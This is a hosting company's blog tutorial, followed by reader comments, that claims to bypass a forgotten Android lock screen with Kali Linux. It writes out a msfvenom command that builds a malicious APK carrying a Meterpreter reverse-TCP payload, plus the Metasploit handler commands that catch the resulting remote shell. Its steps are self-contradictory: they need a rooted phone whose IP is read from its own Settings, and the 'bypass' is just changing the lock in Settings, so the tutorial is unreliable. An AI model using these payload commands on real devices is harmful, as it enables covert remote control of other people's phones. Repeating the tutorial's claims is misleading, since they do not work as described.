Advance

Tutorial Bypass the Lock Screen of Android phone using Kali Linux

Tutorial Bypass the Lock Screen of Android phone using Kali Linux
2.3
(20)

You may forget your Android lock screen pattern, pin, or password for some reason and are looking for a way to bypass it. This can be done using Kali Linux. This article will teach you How to Bypass the Lock Screen of Android phone using Kali Linux. If you intend to buy a Linux VPS server, you can check out the packages offered on the Eldernode website.

How to Bypass Android phone using Kali Linux

Resetting the pattern, pin, or password through your Google account is possible but may not work and you will have to factory reset your device. If you can’t reset your Android lock screen using your Google account, there is no need to do a factory reset. You can bypass your Android lock screen using Kali Linux.

In this tutorial from the Kali Linux training series, you will learn how to bypass the lock screen of an Android phone using Kali Linux.

Recommended Article: Introducing And How To Install Twofi On Kali Linux

Installing Android SDK on Kali Linux

Android SDK is a tool to develop applications on the Android operating system. You can use it to execute commands related to the Android operating system on the computer. This tool offers API libraries and developer tools you need to build, test and debug Android applications. Note that you should have a rooted Android device.

First of all, update your system packages with the following command:

sudo apt update

To install Android SDK on your Kali Linux, just run the command below:

sudo apt install android-sdk

Let’s go to the next step.

Using Metasploit to Exploit Android Phone

Once you have installed Android SDK on your Kali Linux, now it is time to install Metasploit on your Kali Linux and use it to exploit your Android device. Metasploit is an open-source framework that provides public resources for vulnerability research and code development. It allows security professionals to identify intrusions into their networks and identify threats and vulnerabilities.

First, you should find the IP address of your Android device. To do this, go to Settings >> About Phone >> Status path.

Install Metasploit on Kali Linux using the following command:

sudo apt install metasploit-framework

Start the PostgreSQL service and set it up by running the command below:

sudo msfdb init

The following command can help you to interact with various parts of the Metasploit configuration:

sudo msfdb

PostgreSQL is the database of the Metasploit framework. You should start it using the command below:

sudo msfdb start

Now you should create and initialize the msf database by entering the following command:

sudo msfdb init

It’s time to launch msfconsole. To do this, run the following command:

msfconsole -q

Generating Payload with msfvenom in Kali Linux

First, you need to generate an apk file as a malicious payload. To do this, enter the following command:

msfvenom –p android/meterpreter/reverse_tcp LHOST=IP_Address LPORT=4444 R> /var/www/html/ehacking.apk

–> p: It indicates a payload type

–> android/metepreter/reverse_tcp: It specifies a reverse meterpreter shell would come in from a target Android device

–> LHOST: It is your local IP

–> LPORT: It is set as a listening port

–> R> /var/www/html: It gives the output directly on Apache server

–> apk: It is the final name of the final output

Wait for a while until an apk file is generated.

Launching an Attack on Kali Linux 

After you have launched the Metasploit console and have the Android device’s IP address, enter the following command to initiate a reverse TCP connection from the Kali Linux machine to your Android machine:

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST
set LPORT 4444
exploit

After the connection is established, a Meterpreter session will be opened on the Android device. In this section, you can enter the necessary commands to bypass the lock screen.

 

Meterpreter

 

After you see port 4444, make sure you are connected to the Android device.

Bypassing the Lock Screen of an Android Phone Using Kali Linux

Now all you have to do is go to Settings >> Screen Lock path. Then choose your desired screen lock type for an Android phone:

 

Bypass-screen-lock-Android

 

Finally, choose your password and confirm it.

That’s it! You have bypassed the lock screen of an android phone using Kali Linux successfully.

Recommended Article: How to Install and Run Sucrack on Kali Linux

Conclusion

You may forget your Android lock screen password for some reason. In this article, we taught you how to bypass the lock screen of an android phone using Kali Linux. I hope this tutorial was useful for you and helps you to bypass the lock screen of an android phone using Kali Linux. You can contact us in the Comments section if you have any questions or suggestions.

How useful was this post?

Click on a star to rate it!

Average rating 2.3 / 5. Vote count: 20

No votes so far! Be the first to rate this post.

View More Posts
Marilyn Bisson
Content Writer
Eldernode Writer
We Are Waiting for your valuable comments and you can be sure that it will be answered in the shortest possible time.

4 thoughts on “Tutorial Bypass the Lock Screen of Android phone using Kali Linux

    1. Thank you for your opinion
      After bypassing your mobile according to the tutorial, go to Settings > About Device > Status, there you can see the IP address of your device.

  1. All the processes described are done when we have connected an Android phone to computer or a phone is just aside.

  2. The real answer for you,
    Use netdiscover in kali linux to list every ip in the network. Then use your brain to figure out which is the phone..

Leave a Reply

Your email address will not be published. Required fields are marked *

We are by your side every step of the way

Think about developing your online business; We will protect it compassionately

We are by your side every step of the way

+8595670151

7 days a week, 24 hours a day